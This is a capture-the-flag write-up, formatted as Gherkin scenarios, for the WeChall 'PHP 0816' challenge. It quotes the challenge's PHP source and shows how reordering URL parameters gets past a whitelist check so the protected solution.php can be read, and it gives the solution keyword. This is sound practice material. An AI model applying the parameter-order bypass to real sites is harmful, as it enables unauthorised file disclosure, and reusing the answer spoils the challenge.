# language: en

Feature: Solve PHP 0816 challenge
  From the WeChall site
  Of the category Exploit and PHP
  As the registered user disassembly

  Background:
    Given the source code of the challenge that highlights texts
    And three example links with this functionality
    Then I need to read the file "solution.php"

  Scenario Outline: Check the examples
    Given the <link> of each example
    When I access them, it shows me the plain text of the file

    Examples:
      | link                                                |
      | code.php?src=test.php&hl[0]=nice&hl[1]=text&mode=hl |
      | code.php?src=index.php&hl[0]=vulnerable&mode=hl     |
      | code.php?src=code.php&hl[0]=function&mode=hl        |

  Scenario: Try the obvious answer
    When I change the "src" in one of the example links
    """
    code.php?src=solution.php&hl[0]=nice&hl[1]=text&mode=hl
    """
    Then I get the following response:
    """
    File not found:
    """

  Scenario: Find the vulnerabilities
    Given I review the code and find some interesting lines
    """
    114  # ...THIS WILL FIX IT, BUT PEOPLE CAN STILL SEE solution.php :(  #
    115  $filename = str_replace(array('/', '\\', '..'), '',
                                 Common::getGet('src'));#
    """
    But it doesn't represent an attack vector
    Then after some time I realize that the main problem was this function:
    """
    58  function php0816SetSourceFile($filename)
    59  {
    60    $filename = (string) $filename;
    62    static $whitelist = array(
    63      'test.php',
    64      'index.php',
    65      'code.php',
    66    );
    68    # Sanitize by whitelist
    69    if (!in_array($filename, $whitelist, true))
    70    {
    71      $_GET['src'] = false;
    72    }
    73  }
    """
    And I have to bypass it to get the file

  Scenario: Re-arrange the order of the validations
    Given each var in the URL feed the params of a function
    """
    15  foreach ($_GET as $key => $value)
    16  {
    17    if ($key === 'src') {
    18      php0816SetSourceFile($value);
    19    }
    20    elseif ($key === 'mode') {
    21      php0816execute($value);
    22    }
    23    elseif ($key === 'hl') {
    24      php0816addHighlights($value);
    25    }
    26  }
    """
    And the first call is to "php0816SetSourceFile"
    Then I change vars order in the URL:
    """
    solution.php?hl[0]=nice&hl[1]=text&mode=hl&src=solution.php
    """
    And shows me the keyword 'AnotherCodeflowMistake' to solve the challenge
